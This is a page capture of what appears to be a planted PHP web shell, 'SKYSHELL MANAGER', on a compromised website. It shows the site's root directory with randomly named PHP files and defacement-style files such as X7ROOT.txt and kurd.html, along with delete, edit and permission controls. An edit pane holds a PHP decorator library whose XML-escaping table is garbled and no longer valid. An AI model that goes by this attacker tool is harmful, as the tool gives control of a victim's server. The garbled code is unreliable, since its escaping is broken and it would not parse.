📁
SKYSHELL MANAGER
PHP v8.2.30
Create
Create
Path:
root
/
home
/
qooetu
/
costes.qooetu.com
/
Name
Size
Perm
Actions
📁
.well-known
-
0755
🗑️
🏷️
🔒
📁
2e19d9
-
0755
🗑️
🏷️
🔒
📁
6b114
-
0755
🗑️
🏷️
🔒
📁
Modules
-
0755
🗑️
🏷️
🔒
📁
app
-
0755
🗑️
🏷️
🔒
📁
assets
-
0755
🗑️
🏷️
🔒
📁
bootstrap
-
0755
🗑️
🏷️
🔒
📁
cgi-bin
-
0755
🗑️
🏷️
🔒
📁
config
-
0755
🗑️
🏷️
🔒
📁
css
-
0755
🗑️
🏷️
🔒
📁
database
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
nbproject
-
0755
🗑️
🏷️
🔒
📁
public
-
0755
🗑️
🏷️
🔒
📁
resources
-
0755
🗑️
🏷️
🔒
📁
routes
-
0755
🗑️
🏷️
🔒
📁
storage
-
0755
🗑️
🏷️
🔒
📁
tests
-
0755
🗑️
🏷️
🔒
📁
uploads
-
0755
🗑️
🏷️
🔒
📁
vendor
-
0755
🗑️
🏷️
🔒
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.23 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
COOKIE.txt
0.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
X7ROOT.txt
0.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
defaults.php
1.29 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
engine.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
813.08 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
features.php
11.28 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
googlecfb82e09419fc0f6.html
0.05 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php0
1.56 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
inputs.php
0.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
kurd.html
1.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
library.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
min.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
p.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
php.ini
0.04 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
product.php
1.78 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
qpmwztts.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.32 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
tovmbkwh.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tyyffovi.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
veoxv.html
1.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: decorator.inc.php
<?php // $Id: decorator.inc.php,v 1.8 2007/04/05 11:09:38 mr-russ Exp $ // This group of functions and classes provides support for // resolving values in a lazy manner (ie, as and when required) // using the Decorator pattern. ###TODO: Better documentation!!! // Construction functions: function field($fieldName, $default = null) { return new FieldDecorator($fieldName, $default); } function merge(/* ... */) { return new ArrayMergeDecorator(func_get_args()); } function concat(/* ... */) { return new ConcatDecorator(func_get_args()); } function callback($callback, $params = null) { return new CallbackDecorator($callback, $params); } function ifempty($value, $empty, $full = null) { return new IfEmptyDecorator($value, $empty, $full); } function url($base, $vars = null /* ... */) { // If more than one array of vars is given, // use an ArrayMergeDecorator to have them merged // at value evaluation time. if (func_num_args() > 2) { $v = func_get_args(); array_shift($v); return new UrlDecorator($base, new ArrayMergeDecorator($v)); } return new UrlDecorator($base, $vars); } function replace($str, $params) { return new replaceDecorator($str, $params); } // Resolving functions: function value(&$var, &$fields, $esc = null) { if (is_a($var, 'Decorator')) { $val = $var->value($fields); } else { $val =& $var; } if (is_string($val)) { switch($esc) { case 'xml': return strtr($val, array( '&' => '&', "'" => ''', '"' => '"', '<' => '<', '>' => '>' )); case 'html': return htmlentities($val, ENT_COMPAT, 'UTF-8'); case 'url': return urlencode($val); } } return $val; } function value_xml(&$var, &$fields) { return value($var, $fields, 'xml'); } function value_xml_attr($attr, &$var, &$fields) { $val = value($var, $fields, 'xml'); if (!empty($val)) return " {$attr}=\"{$val}\""; else return ''; } function value_url(&$var, &$fields) { return value($var, $fields, 'url'); } // Underlying classes: class Decorator { protected $v; function __construct($value) { $this->v = $value; } function value($fields) { return $this->v; } } class FieldDecorator extends Decorator { protected $d; protected $f; function __construct($fieldName, $default = null) { $this->f = $fieldName; if ($default !== null) $this->d = $default; } function value($fields) { return isset($fields[$this->f]) ? value($fields[$this->f], $fields) : (isset($this->d) ? $this->d : null); } } class ArrayMergeDecorator extends Decorator { protected $m; function __construct($arrays) { $this->m = $arrays; } function value($fields) { $accum = array(); foreach($this->m as $var) { $accum = array_merge($accum, value($var, $fields)); } return $accum; } } class ConcatDecorator extends Decorator { protected $c; function __construct($values) { $this->c = $values; } function value($fields) { $accum = ''; foreach($this->c as $var) { $accum .= value($var, $fields); } return trim($accum); } } class CallbackDecorator extends Decorator { protected $fn; protected $p; function __construct($callback, $param = null) { $this->fn = $callback; $this->p = $param; } function value($fields) { return call_user_func($this->fn, $fields, $this->p); } } class IfEmptyDecorator extends Decorator { protected $e; protected $f; function __construct($value, $empty, $full = null) { $this->v = $value; $this->e = $empty; if ($full !== null) $this->f = $full; } function value($fields) { $val = value($this->v, $fields); if (empty($val)) return value($this->e, $fields); else return isset($this->f) ? value($this->f, $fields) : $val; } } class UrlDecorator extends Decorator { protected $b; protected $q; function __construct($base, $queryVars = null) { $this->b = $base; if ($queryVars !== null) $this->q = $queryVars; } function value($fields) { $url = value($this->b, $fields); if ($url === false) return ''; if (!empty($this->q)) { $queryVars = value($this->q, $fields); $sep = '?'; foreach ($queryVars as $var => $value) { $url .= $sep . value_url($var, $fields) . '=' . value_url($value, $fields); $sep = '&'; } } return $url; } } class replaceDecorator extends Decorator { protected $s; protected $p; function __construct($str, $params) { $this->s = $str; $this->p = $params; } function value($fields) { $str = $this->s; foreach ($this->p as $k => $v) { $str = str_replace($k, value($v, $fields), $str); } return $str; } }
Save